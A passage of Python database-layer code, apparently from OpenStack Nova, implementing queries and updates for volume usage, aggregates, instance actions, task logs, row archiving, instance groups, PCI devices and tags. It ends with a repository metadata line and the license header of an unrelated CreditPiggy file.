'instance_uuid': instance_id,
'project_id': project_id,
'user_id': user_id,
'availability_zone': availability_zone}
else:
values = {'tot_last_refreshed': refreshed,
'tot_reads': models.VolumeUsage.tot_reads + rd_req,
'tot_read_bytes': models.VolumeUsage.tot_read_bytes +
rd_bytes,
'tot_writes': models.VolumeUsage.tot_writes + wr_req,
'tot_write_bytes': models.VolumeUsage.tot_write_bytes +
wr_bytes,
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'instance_uuid': instance_id,
'project_id': project_id,
'user_id': user_id,
'availability_zone': availability_zone}
current_usage = model_query(context, models.VolumeUsage,
read_deleted="yes").\
filter_by(volume_id=id).\
first()
if current_usage:
if (rd_req < current_usage['curr_reads'] or
rd_bytes < current_usage['curr_read_bytes'] or
wr_req < current_usage['curr_writes'] or
wr_bytes < current_usage['curr_write_bytes']):
LOG.info(_LI("Volume(%s) has lower stats then what is in "
"the database. Instance must have been rebooted "
"or crashed. Updating totals."), id)
if not update_totals:
values['tot_reads'] = (models.VolumeUsage.tot_reads +
current_usage['curr_reads'])
values['tot_read_bytes'] = (
models.VolumeUsage.tot_read_bytes +
current_usage['curr_read_bytes'])
values['tot_writes'] = (models.VolumeUsage.tot_writes +
current_usage['curr_writes'])
values['tot_write_bytes'] = (
models.VolumeUsage.tot_write_bytes +
current_usage['curr_write_bytes'])
else:
values['tot_reads'] = (models.VolumeUsage.tot_reads +
current_usage['curr_reads'] +
rd_req)
values['tot_read_bytes'] = (
models.VolumeUsage.tot_read_bytes +
current_usage['curr_read_bytes'] + rd_bytes)
values['tot_writes'] = (models.VolumeUsage.tot_writes +
current_usage['curr_writes'] +
wr_req)
values['tot_write_bytes'] = (
models.VolumeUsage.tot_write_bytes +
current_usage['curr_write_bytes'] + wr_bytes)
current_usage.update(values)
current_usage.save(context.session)
context.session.refresh(current_usage)
return current_usage
vol_usage = models.VolumeUsage()
vol_usage.volume_id = id
vol_usage.instance_uuid = instance_id
vol_usage.project_id = project_id
vol_usage.user_id = user_id
vol_usage.availability_zone = availability_zone
if not update_totals:
vol_usage.curr_last_refreshed = refreshed
vol_usage.curr_reads = rd_req
vol_usage.curr_read_bytes = rd_bytes
vol_usage.curr_writes = wr_req
vol_usage.curr_write_bytes = wr_bytes
else:
vol_usage.tot_last_refreshed = refreshed
vol_usage.tot_reads = rd_req
vol_usage.tot_read_bytes = rd_bytes
vol_usage.tot_writes = wr_req
vol_usage.tot_write_bytes = wr_bytes
vol_usage.save(context.session)
return vol_usage
####################
@main_context_manager.reader
def s3_image_get(context, image_id):
"""Find local s3 image represented by the provided id."""
result = model_query(context, models.S3Image, read_deleted="yes").\
filter_by(id=image_id).\
first()
if not result:
raise exception.ImageNotFound(image_id=image_id)
return result
@main_context_manager.reader
def s3_image_get_by_uuid(context, image_uuid):
"""Find local s3 image represented by the provided uuid."""
result = model_query(context, models.S3Image, read_deleted="yes").\
filter_by(uuid=image_uuid).\
first()
if not result:
raise exception.ImageNotFound(image_id=image_uuid)
return result
@main_context_manager.writer
def s3_image_create(context, image_uuid):
"""Create local s3 image represented by provided uuid."""
try:
s3_image_ref = models.S3Image()
s3_image_ref.update({'uuid': image_uuid})
s3_image_ref.save(context.session)
except Exception as e:
raise db_exc.DBError(e)
return s3_image_ref
####################
def _aggregate_get_query(context, model_class, id_field=None, id=None,
read_deleted=None):
columns_to_join = {models.Aggregate: ['_hosts', '_metadata']}
query = model_query(context, model_class, read_deleted=read_deleted)
for c in columns_to_join.get(model_class, []):
query = query.options(joinedload(c))
if id and id_field:
query = query.filter(id_field == id)
return query
@main_context_manager.writer
def aggregate_create(context, values, metadata=None):
query = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.name,
values['name'],
read_deleted='no')
aggregate = query.first()
if not aggregate:
aggregate = models.Aggregate()
aggregate.update(values)
aggregate.save(context.session)
# We don't want these to be lazy loaded later. We know there is
# nothing here since we just created this aggregate.
aggregate._hosts = []
aggregate._metadata = []
else:
raise exception.AggregateNameExists(aggregate_name=values['name'])
if metadata:
aggregate_metadata_add(context, aggregate.id, metadata)
# NOTE(pkholkin): '_metadata' attribute was updated during
# 'aggregate_metadata_add' method, so it should be expired and
# read from db
context.session.expire(aggregate, ['_metadata'])
aggregate._metadata
return aggregate
@main_context_manager.reader
def aggregate_get(context, aggregate_id):
query = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id)
aggregate = query.first()
if not aggregate:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
return aggregate
@main_context_manager.reader
def aggregate_get_by_host(context, host, key=None):
"""Return rows that match host (mandatory) and metadata key (optional).
:param host matches host, and is required.
:param key Matches metadata key, if not None.
"""
query = model_query(context, models.Aggregate)
query = query.options(joinedload('_hosts'))
query = query.options(joinedload('_metadata'))
query = query.join('_hosts')
query = query.filter(models.AggregateHost.host == host)
if key:
query = query.join("_metadata").filter(
models.AggregateMetadata.key == key)
return query.all()
@main_context_manager.reader
def aggregate_metadata_get_by_host(context, host, key=None):
query = model_query(context, models.Aggregate)
query = query.join("_hosts")
query = query.join("_metadata")
query = query.filter(models.AggregateHost.host == host)
query = query.options(contains_eager("_metadata"))
if key:
query = query.filter(models.AggregateMetadata.key == key)
rows = query.all()
metadata = collections.defaultdict(set)
for agg in rows:
for kv in agg._metadata:
metadata[kv['key']].add(kv['value'])
return dict(metadata)
@main_context_manager.reader
def aggregate_get_by_metadata_key(context, key):
"""Return rows that match metadata key.
:param key Matches metadata key.
"""
query = model_query(context, models.Aggregate)
query = query.join("_metadata")
query = query.filter(models.AggregateMetadata.key == key)
query = query.options(contains_eager("_metadata"))
query = query.options(joinedload("_hosts"))
return query.all()
@main_context_manager.writer
def aggregate_update(context, aggregate_id, values):
if "name" in values:
aggregate_by_name = (_aggregate_get_query(context,
models.Aggregate,
models.Aggregate.name,
values['name'],
read_deleted='no').first())
if aggregate_by_name and aggregate_by_name.id != aggregate_id:
# there is another aggregate with the new name
raise exception.AggregateNameExists(aggregate_name=values['name'])
aggregate = (_aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id).first())
set_delete = True
if aggregate:
if "availability_zone" in values:
az = values.pop('availability_zone')
if 'metadata' not in values:
values['metadata'] = {'availability_zone': az}
set_delete = False
else:
values['metadata']['availability_zone'] = az
metadata = values.get('metadata')
if metadata is not None:
aggregate_metadata_add(context,
aggregate_id,
values.pop('metadata'),
set_delete=set_delete)
aggregate.update(values)
aggregate.save(context.session)
return aggregate_get(context, aggregate.id)
else:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
@main_context_manager.writer
def aggregate_delete(context, aggregate_id):
count = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id).\
soft_delete()
if count == 0:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
# Delete Metadata
model_query(context, models.AggregateMetadata).\
filter_by(aggregate_id=aggregate_id).\
soft_delete()
@main_context_manager.reader
def aggregate_get_all(context):
return _aggregate_get_query(context, models.Aggregate).all()
def _aggregate_metadata_get_query(context, aggregate_id, read_deleted="yes"):
return model_query(context,
models.AggregateMetadata,
read_deleted=read_deleted).\
filter_by(aggregate_id=aggregate_id)
@require_aggregate_exists
@main_context_manager.reader
def aggregate_metadata_get(context, aggregate_id):
rows = model_query(context,
models.AggregateMetadata).\
filter_by(aggregate_id=aggregate_id).all()
return {r['key']: r['value'] for r in rows}
@require_aggregate_exists
@main_context_manager.writer
def aggregate_metadata_delete(context, aggregate_id, key):
count = _aggregate_get_query(context,
models.AggregateMetadata,
models.AggregateMetadata.aggregate_id,
aggregate_id).\
filter_by(key=key).\
soft_delete()
if count == 0:
raise exception.AggregateMetadataNotFound(aggregate_id=aggregate_id,
metadata_key=key)
@require_aggregate_exists
@main_context_manager.writer
def aggregate_metadata_add(context, aggregate_id, metadata, set_delete=False,
max_retries=10):
all_keys = metadata.keys()
for attempt in range(max_retries):
try:
query = _aggregate_metadata_get_query(context, aggregate_id,
read_deleted='no')
if set_delete:
query.filter(~models.AggregateMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = set()
if all_keys:
query = query.filter(
models.AggregateMetadata.key.in_(all_keys))
for meta_ref in query.all():
key = meta_ref.key
meta_ref.update({"value": metadata[key]})
already_existing_keys.add(key)
new_entries = []
for key, value in metadata.items():
if key in already_existing_keys:
continue
new_entries.append({"key": key,
"value": value,
"aggregate_id": aggregate_id})
if new_entries:
context.session.execute(
models.AggregateMetadata.__table__.insert(),
new_entries)
return metadata
except db_exc.DBDuplicateEntry:
# a concurrent transaction has been committed,
# try again unless this was the last attempt
with excutils.save_and_reraise_exception() as ctxt:
if attempt < max_retries - 1:
ctxt.reraise = False
else:
msg = _("Add metadata failed for aggregate %(id)s after "
"%(retries)s retries") % {"id": aggregate_id,
"retries": max_retries}
LOG.warning(msg)
@require_aggregate_exists
@main_context_manager.reader
def aggregate_host_get_all(context, aggregate_id):
rows = model_query(context,
models.AggregateHost).\
filter_by(aggregate_id=aggregate_id).all()
return [r.host for r in rows]
@require_aggregate_exists
@main_context_manager.writer
def aggregate_host_delete(context, aggregate_id, host):
count = _aggregate_get_query(context,
models.AggregateHost,
models.AggregateHost.aggregate_id,
aggregate_id).\
filter_by(host=host).\
soft_delete()
if count == 0:
raise exception.AggregateHostNotFound(aggregate_id=aggregate_id,
host=host)
@require_aggregate_exists
@main_context_manager.writer
def aggregate_host_add(context, aggregate_id, host):
host_ref = models.AggregateHost()
host_ref.update({"host": host, "aggregate_id": aggregate_id})
try:
host_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.AggregateHostExists(host=host,
aggregate_id=aggregate_id)
return host_ref
################
@pick_context_manager_writer
def instance_fault_create(context, values):
"""Create a new InstanceFault."""
fault_ref = models.InstanceFault()
fault_ref.update(values)
fault_ref.save(context.session)
return dict(fault_ref)
@pick_context_manager_reader
def instance_fault_get_by_instance_uuids(context, instance_uuids):
"""Get all instance faults for the provided instance_uuids."""
if not instance_uuids:
return {}
rows = model_query(context, models.InstanceFault, read_deleted='no').\
filter(models.InstanceFault.instance_uuid.in_(
instance_uuids)).\
order_by(desc("created_at"), desc("id")).\
all()
output = {}
for instance_uuid in instance_uuids:
output[instance_uuid] = []
for row in rows:
data = dict(row)
output[row['instance_uuid']].append(data)
return output
##################
@pick_context_manager_writer
def action_start(context, values):
convert_objects_related_datetimes(values, 'start_time')
action_ref = models.InstanceAction()
action_ref.update(values)
action_ref.save(context.session)
return action_ref
@pick_context_manager_writer
def action_finish(context, values):
convert_objects_related_datetimes(values, 'start_time', 'finish_time')
query = model_query(context, models.InstanceAction).\
filter_by(instance_uuid=values['instance_uuid']).\
filter_by(request_id=values['request_id'])
if query.update(values) != 1:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
return query.one()
@pick_context_manager_reader
def actions_get(context, instance_uuid):
"""Get all instance actions for the provided uuid."""
actions = model_query(context, models.InstanceAction).\
filter_by(instance_uuid=instance_uuid).\
order_by(desc("created_at"), desc("id")).\
all()
return actions
@pick_context_manager_reader
def action_get_by_request_id(context, instance_uuid, request_id):
"""Get the action by request_id and given instance."""
action = _action_get_by_request_id(context, instance_uuid, request_id)
return action
def _action_get_by_request_id(context, instance_uuid, request_id):
result = model_query(context, models.InstanceAction).\
filter_by(instance_uuid=instance_uuid).\
filter_by(request_id=request_id).\
first()
return result
def _action_get_last_created_by_instance_uuid(context, instance_uuid):
result = (model_query(context, models.InstanceAction).
filter_by(instance_uuid=instance_uuid).
order_by(desc("created_at"), desc("id")).
first())
return result
@pick_context_manager_writer
def action_event_start(context, values):
"""Start an event on an instance action."""
convert_objects_related_datetimes(values, 'start_time')
action = _action_get_by_request_id(context, values['instance_uuid'],
values['request_id'])
# When nova-compute restarts, the context is generated again in
# init_host workflow, the request_id was different with the request_id
# recorded in InstanceAction, so we can't get the original record
# according to request_id. Try to get the last created action so that
# init_instance can continue to finish the recovery action, like:
# powering_off, unpausing, and so on.
if not action and not context.project_id:
action = _action_get_last_created_by_instance_uuid(
context, values['instance_uuid'])
if not action:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
values['action_id'] = action['id']
event_ref = models.InstanceActionEvent()
event_ref.update(values)
context.session.add(event_ref)
return event_ref
@pick_context_manager_writer
def action_event_finish(context, values):
"""Finish an event on an instance action."""
convert_objects_related_datetimes(values, 'start_time', 'finish_time')
action = _action_get_by_request_id(context, values['instance_uuid'],
values['request_id'])
# When nova-compute restarts, the context is generated again in
# init_host workflow, the request_id was different with the request_id
# recorded in InstanceAction, so we can't get the original record
# according to request_id. Try to get the last created action so that
# init_instance can continue to finish the recovery action, like:
# powering_off, unpausing, and so on.
if not action and not context.project_id:
action = _action_get_last_created_by_instance_uuid(
context, values['instance_uuid'])
if not action:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
event_ref = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action['id']).\
filter_by(event=values['event']).\
first()
if not event_ref:
raise exception.InstanceActionEventNotFound(action_id=action['id'],
event=values['event'])
event_ref.update(values)
if values['result'].lower() == 'error':
action.update({'message': 'Error'})
return event_ref
@pick_context_manager_reader
def action_events_get(context, action_id):
events = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action_id).\
order_by(desc("created_at"), desc("id")).\
all()
return events
@pick_context_manager_reader
def action_event_get_by_id(context, action_id, event_id):
event = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action_id).\
filter_by(id=event_id).\
first()
return event
##################
@require_context
@pick_context_manager_writer
def ec2_instance_create(context, instance_uuid, id=None):
"""Create ec2 compatible instance by provided uuid."""
ec2_instance_ref = models.InstanceIdMapping()
ec2_instance_ref.update({'uuid': instance_uuid})
if id is not None:
ec2_instance_ref.update({'id': id})
ec2_instance_ref.save(context.session)
return ec2_instance_ref
@require_context
@pick_context_manager_reader
def ec2_instance_get_by_uuid(context, instance_uuid):
result = _ec2_instance_get_query(context).\
filter_by(uuid=instance_uuid).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_uuid)
return result
@require_context
@pick_context_manager_reader
def ec2_instance_get_by_id(context, instance_id):
result = _ec2_instance_get_query(context).\
filter_by(id=instance_id).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_id)
return result
@require_context
@pick_context_manager_reader
def get_instance_uuid_by_ec2_id(context, ec2_id):
result = ec2_instance_get_by_id(context, ec2_id)
return result['uuid']
def _ec2_instance_get_query(context):
return model_query(context, models.InstanceIdMapping, read_deleted='yes')
##################
def _task_log_get_query(context, task_name, period_beginning,
period_ending, host=None, state=None):
values = {'period_beginning': period_beginning,
'period_ending': period_ending}
values = convert_objects_related_datetimes(values, *values.keys())
query = model_query(context, models.TaskLog).\
filter_by(task_name=task_name).\
filter_by(period_beginning=values['period_beginning']).\
filter_by(period_ending=values['period_ending'])
if host is not None:
query = query.filter_by(host=host)
if state is not None:
query = query.filter_by(state=state)
return query
@pick_context_manager_reader
def task_log_get(context, task_name, period_beginning, period_ending, host,
state=None):
return _task_log_get_query(context, task_name, period_beginning,
period_ending, host, state).first()
@pick_context_manager_reader
def task_log_get_all(context, task_name, period_beginning, period_ending,
host=None, state=None):
return _task_log_get_query(context, task_name, period_beginning,
period_ending, host, state).all()
@pick_context_manager_writer
def task_log_begin_task(context, task_name, period_beginning, period_ending,
host, task_items=None, message=None):
values = {'period_beginning': period_beginning,
'period_ending': period_ending}
values = convert_objects_related_datetimes(values, *values.keys())
task = models.TaskLog()
task.task_name = task_name
task.period_beginning = values['period_beginning']
task.period_ending = values['period_ending']
task.host = host
task.state = "RUNNING"
if message:
task.message = message
if task_items:
task.task_items = task_items
try:
task.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.TaskAlreadyRunning(task_name=task_name, host=host)
@pick_context_manager_writer
def task_log_end_task(context, task_name, period_beginning, period_ending,
host, errors, message=None):
values = dict(state="DONE", errors=errors)
if message:
values["message"] = message
rows = _task_log_get_query(context, task_name, period_beginning,
period_ending, host).update(values)
if rows == 0:
# It's not running!
raise exception.TaskNotRunning(task_name=task_name, host=host)
##################
def _archive_deleted_rows_for_table(tablename, max_rows):
"""Move up to max_rows rows from one tables to the corresponding
shadow table.
:returns: number of rows archived
"""
# NOTE(guochbo): There is a circular import, nova.db.sqlalchemy.utils
# imports nova.db.sqlalchemy.api.
from nova.db.sqlalchemy import utils as db_utils
engine = get_engine()
conn = engine.connect()
metadata = MetaData()
metadata.bind = engine
# NOTE(tdurakov): table metadata should be received
# from models, not db tables. Default value specified by SoftDeleteMixin
# is known only by models, not DB layer.
# IMPORTANT: please do not change source of metadata information for table.
table = models.BASE.metadata.tables[tablename]
shadow_tablename = _SHADOW_TABLE_PREFIX + tablename
rows_archived = 0
try:
shadow_table = Table(shadow_tablename, metadata, autoload=True)
except NoSuchTableError:
# No corresponding shadow table; skip it.
return rows_archived
if tablename == "dns_domains":
# We have one table (dns_domains) where the key is called
# "domain" rather than "id"
column = table.c.domain
else:
column = table.c.id
# NOTE(guochbo): Use DeleteFromSelect to avoid
# database's limit of maximum parameter in one SQL statement.
deleted_column = table.c.deleted
columns = [c.name for c in table.c]
insert = shadow_table.insert(inline=True).\
from_select(columns,
sql.select([table],
deleted_column != deleted_column.default.arg).
order_by(column).limit(max_rows))
query_delete = sql.select([column],
deleted_column != deleted_column.default.arg).\
order_by(column).limit(max_rows)
delete_statement = db_utils.DeleteFromSelect(table, query_delete, column)
try:
# Group the insert and delete in a transaction.
with conn.begin():
conn.execute(insert)
result_delete = conn.execute(delete_statement)
except db_exc.DBReferenceError as ex:
# A foreign key constraint keeps us from deleting some of
# these rows until we clean up a dependent table. Just
# skip this table for now; we'll come back to it later.
LOG.warning(_LW("IntegrityError detected when archiving table "
"%(tablename)s: %(error)s"),
{'tablename': tablename, 'error': six.text_type(ex)})
return rows_archived
rows_archived = result_delete.rowcount
return rows_archived
def archive_deleted_rows(max_rows=None):
"""Move up to max_rows rows from production tables to the corresponding
shadow tables.
:returns: dict that maps table name to number of rows archived from that
table, for example:
::
{
'instances': 5,
'block_device_mapping': 5,
'pci_devices': 2,
}
"""
table_to_rows_archived = {}
total_rows_archived = 0
meta = MetaData(get_engine(use_slave=True))
meta.reflect()
# Reverse sort the tables so we get the leaf nodes first for processing.
for table in reversed(meta.sorted_tables):
tablename = table.name
# skip the special sqlalchemy-migrate migrate_version table and any
# shadow tables
if (tablename == 'migrate_version' or
tablename.startswith(_SHADOW_TABLE_PREFIX)):
continue
rows_archived = _archive_deleted_rows_for_table(
tablename, max_rows=max_rows - total_rows_archived)
total_rows_archived += rows_archived
# Only report results for tables that had updates.
if rows_archived:
table_to_rows_archived[tablename] = rows_archived
if total_rows_archived >= max_rows:
break
return table_to_rows_archived
@main_context_manager.writer
def pcidevice_online_data_migration(context, max_count):
from nova.objects import pci_device as pci_dev_obj
count_all = 0
count_hit = 0
if not pci_dev_obj.PciDevice.should_migrate_data():
LOG.error(_LE("Data migrations for PciDevice are not safe, likely "
"because not all services that access the DB directly "
"are updated to the latest version"))
else:
results = model_query(context, models.PciDevice).filter_by(
parent_addr=None).limit(max_count)
for db_dict in results:
count_all += 1
pci_dev = pci_dev_obj.PciDevice._from_db_object(
context, pci_dev_obj.PciDevice(), db_dict)
if pci_dev.obj_what_changed():
pci_dev.save()
count_hit += 1
return count_all, count_hit
@main_context_manager.writer
def aggregate_uuids_online_data_migration(context, max_count):
from nova.objects import aggregate
count_all = 0
count_hit = 0
results = model_query(context, models.Aggregate).filter_by(
uuid=None).limit(max_count)
for db_agg in results:
count_all += 1
agg = aggregate.Aggregate._from_db_object(context,
aggregate.Aggregate(),
db_agg)
if 'uuid' in agg:
count_hit += 1
return count_all, count_hit
@main_context_manager.writer
def computenode_uuids_online_data_migration(context, max_count):
from nova.objects import compute_node
count_all = 0
count_hit = 0
results = model_query(context, models.ComputeNode).filter_by(
uuid=None).limit(max_count)
for db_cn in results:
count_all += 1
cn = compute_node.ComputeNode._from_db_object(
context, compute_node.ComputeNode(), db_cn)
if 'uuid' in cn:
count_hit += 1
return count_all, count_hit
####################
def _instance_group_get_query(context, model_class, id_field=None, id=None,
read_deleted=None):
columns_to_join = {models.InstanceGroup: ['_policies', '_members']}
query = model_query(context, model_class, read_deleted=read_deleted,
project_only=True)
for c in columns_to_join.get(model_class, []):
query = query.options(joinedload(c))
if id and id_field:
query = query.filter(id_field == id)
return query
@main_context_manager.writer
def instance_group_create(context, values, policies=None, members=None):
"""Create a new group."""
uuid = values.get('uuid', None)
if uuid is None:
uuid = uuidutils.generate_uuid()
values['uuid'] = uuid
try:
group = models.InstanceGroup()
group.update(values)
group.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.InstanceGroupIdExists(group_uuid=uuid)
# We don't want '_policies' and '_members' attributes to be lazy loaded
# later. We know there is nothing here since we just created this
# instance group.
if policies:
_instance_group_policies_add(context, group.id, policies)
else:
group._policies = []
if members:
_instance_group_members_add(context, group.id, members)
else:
group._members = []
return instance_group_get(context, uuid)
@main_context_manager.reader
def instance_group_get(context, group_uuid):
"""Get a specific group by uuid."""
group = _instance_group_get_query(context,
models.InstanceGroup,
models.InstanceGroup.uuid,
group_uuid).\
first()
if not group:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
return group
@main_context_manager.reader
def instance_group_get_by_instance(context, instance_uuid):
group_member = model_query(context, models.InstanceGroupMember).\
filter_by(instance_id=instance_uuid).\
first()
if not group_member:
raise exception.InstanceGroupNotFound(group_uuid='')
group = _instance_group_get_query(context, models.InstanceGroup,
models.InstanceGroup.id,
group_member.group_id).first()
if not group:
raise exception.InstanceGroupNotFound(
group_uuid=group_member.group_id)
return group
@main_context_manager.writer
def instance_group_update(context, group_uuid, values):
"""Update the attributes of a group.
If values contains a metadata key, it updates the aggregate metadata
too. Similarly for the policies and members.
"""
group = model_query(context, models.InstanceGroup).\
filter_by(uuid=group_uuid).\
first()
if not group:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
policies = values.get('policies')
if policies is not None:
_instance_group_policies_add(context,
group.id,
values.pop('policies'),
set_delete=True)
members = values.get('members')
if members is not None:
_instance_group_members_add(context,
group.id,
values.pop('members'),
set_delete=True)
group.update(values)
if policies:
values['policies'] = policies
if members:
values['members'] = members
@main_context_manager.writer
def instance_group_delete(context, group_uuid):
"""Delete a group."""
group_id = _instance_group_id(context, group_uuid)
count = _instance_group_get_query(context,
models.InstanceGroup,
models.InstanceGroup.uuid,
group_uuid).soft_delete()
if count == 0:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
# Delete policies, metadata and members
instance_models = [models.InstanceGroupPolicy,
models.InstanceGroupMember]
for model in instance_models:
model_query(context, model).filter_by(group_id=group_id).soft_delete()
@main_context_manager.reader
def instance_group_get_all(context):
"""Get all groups."""
return _instance_group_get_query(context, models.InstanceGroup).all()
@main_context_manager.reader
def instance_group_get_all_by_project_id(context, project_id):
"""Get all groups."""
return _instance_group_get_query(context, models.InstanceGroup).\
filter_by(project_id=project_id).\
all()
def _instance_group_count_by_project_and_user(context, project_id, user_id):
return model_query(context, models.InstanceGroup, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
count()
def _instance_group_model_get_query(context, model_class, group_id,
read_deleted='no'):
return model_query(context,
model_class,
read_deleted=read_deleted).\
filter_by(group_id=group_id)
def _instance_group_id(context, group_uuid):
"""Returns the group database ID for the group UUID."""
result = model_query(context,
models.InstanceGroup,
(models.InstanceGroup.id,)).\
filter_by(uuid=group_uuid).\
first()
if not result:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
return result.id
def _instance_group_members_add(context, id, members, set_delete=False):
all_members = set(members)
query = _instance_group_model_get_query(context,
models.InstanceGroupMember, id)
if set_delete:
query.filter(~models.InstanceGroupMember.instance_id.in_(
all_members)).\
soft_delete(synchronize_session=False)
query = query.filter(
models.InstanceGroupMember.instance_id.in_(all_members))
already_existing = set()
for member_ref in query.all():
already_existing.add(member_ref.instance_id)
for instance_id in members:
if instance_id in already_existing:
continue
member_ref = models.InstanceGroupMember()
member_ref.update({'instance_id': instance_id,
'group_id': id})
context.session.add(member_ref)
return members
@main_context_manager.writer
def instance_group_members_add(context, group_uuid, members,
set_delete=False):
id = _instance_group_id(context, group_uuid)
return _instance_group_members_add(context, id, members,
set_delete=set_delete)
@main_context_manager.writer
def instance_group_member_delete(context, group_uuid, instance_id):
id = _instance_group_id(context, group_uuid)
count = _instance_group_model_get_query(context,
models.InstanceGroupMember,
id).\
filter_by(instance_id=instance_id).\
soft_delete()
if count == 0:
raise exception.InstanceGroupMemberNotFound(group_uuid=group_uuid,
instance_id=instance_id)
@main_context_manager.reader
def instance_group_members_get(context, group_uuid):
id = _instance_group_id(context, group_uuid)
instances = model_query(context,
models.InstanceGroupMember,
(models.InstanceGroupMember.instance_id,)).\
filter_by(group_id=id).all()
return [instance[0] for instance in instances]
def _instance_group_policies_add(context, id, policies, set_delete=False):
allpols = set(policies)
query = _instance_group_model_get_query(context,
models.InstanceGroupPolicy, id)
if set_delete:
query.filter(~models.InstanceGroupPolicy.policy.in_(allpols)).\
soft_delete(synchronize_session=False)
query = query.filter(models.InstanceGroupPolicy.policy.in_(allpols))
already_existing = set()
for policy_ref in query.all():
already_existing.add(policy_ref.policy)
for policy in policies:
if policy in already_existing:
continue
policy_ref = models.InstanceGroupPolicy()
policy_ref.update({'policy': policy,
'group_id': id})
context.session.add(policy_ref)
return policies
####################
@pick_context_manager_reader
def pci_device_get_by_addr(context, node_id, dev_addr):
pci_dev_ref = model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(address=dev_addr).\
first()
if not pci_dev_ref:
raise exception.PciDeviceNotFound(node_id=node_id, address=dev_addr)
return pci_dev_ref
@pick_context_manager_reader
def pci_device_get_by_id(context, id):
pci_dev_ref = model_query(context, models.PciDevice).\
filter_by(id=id).\
first()
if not pci_dev_ref:
raise exception.PciDeviceNotFoundById(id=id)
return pci_dev_ref
@pick_context_manager_reader
def pci_device_get_all_by_node(context, node_id):
return model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
all()
@pick_context_manager_reader
def pci_device_get_all_by_parent_addr(context, node_id, parent_addr):
return model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(parent_addr=parent_addr).\
all()
@require_context
@pick_context_manager_reader
def pci_device_get_all_by_instance_uuid(context, instance_uuid):
return model_query(context, models.PciDevice).\
filter_by(status='allocated').\
filter_by(instance_uuid=instance_uuid).\
all()
@pick_context_manager_reader
def _instance_pcidevs_get_multi(context, instance_uuids):
if not instance_uuids:
return []
return model_query(context, models.PciDevice).\
filter_by(status='allocated').\
filter(models.PciDevice.instance_uuid.in_(instance_uuids))
@pick_context_manager_writer
def pci_device_destroy(context, node_id, address):
result = model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(address=address).\
soft_delete()
if not result:
raise exception.PciDeviceNotFound(node_id=node_id, address=address)
@pick_context_manager_writer
def pci_device_update(context, node_id, address, values):
query = model_query(context, models.PciDevice, read_deleted="no").\
filter_by(compute_node_id=node_id).\
filter_by(address=address)
if query.update(values) == 0:
device = models.PciDevice()
device.update(values)
context.session.add(device)
return query.one()
####################
@pick_context_manager_writer
def instance_tag_add(context, instance_uuid, tag):
tag_ref = models.Tag()
tag_ref.resource_id = instance_uuid
tag_ref.tag = tag
try:
_check_instance_exists_in_project(context, instance_uuid)
with get_context_manager(context).writer.savepoint.using(context):
context.session.add(tag_ref)
except db_exc.DBDuplicateEntry:
# NOTE(snikitin): We should ignore tags duplicates
pass
return tag_ref
@pick_context_manager_writer
def instance_tag_set(context, instance_uuid, tags):
_check_instance_exists_in_project(context, instance_uuid)
existing = context.session.query(models.Tag.tag).filter_by(
resource_id=instance_uuid).all()
existing = set(row.tag for row in existing)
tags = set(tags)
to_delete = existing - tags
to_add = tags - existing
if to_delete:
context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).filter(
models.Tag.tag.in_(to_delete)).delete(
synchronize_session=False)
if to_add:
data = [
{'resource_id': instance_uuid, 'tag': tag} for tag in to_add]
context.session.execute(models.Tag.__table__.insert(), data)
return context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).all()
@pick_context_manager_reader
def instance_tag_get_by_instance_uuid(context, instance_uuid):
_check_instance_exists_in_project(context, instance_uuid)
return context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).all()
@pick_context_manager_writer
def instance_tag_delete(context, instance_uuid, tag):
_check_instance_exists_in_project(context, instance_uuid)
result = context.session.query(models.Tag).filter_by(
resource_id=instance_uuid, tag=tag).delete()
if not result:
raise exception.InstanceTagNotFound(instance_id=instance_uuid,
tag=tag)
@pick_context_manager_writer
def instance_tag_delete_all(context, instance_uuid):
_check_instance_exists_in_project(context, instance_uuid)
context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).delete()
@main_context_manager.reader
def instance_tag_exists(context, instance_uuid, tag):
_check_instance_exists_in_project(context, instance_uuid)
q = context.session.query(models.Tag).filter_by(
resource_id=instance_uuid, tag=tag)
return context.session.query(q.exists()).scalar()
| apache-2.0 | -8,825,773,516,021,315,000 | 35.131468 | 79 | 0.613147 | false |
wavesoft/creditpiggy | creditpiggy-server/creditpiggy/core/leaderboard.py | 1 | 6519 | ################################################################
# CreditPiggy - Volunteering Computing Credit Bank Project
# Copyright (C) 2015 Ioannis Charalampidis
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
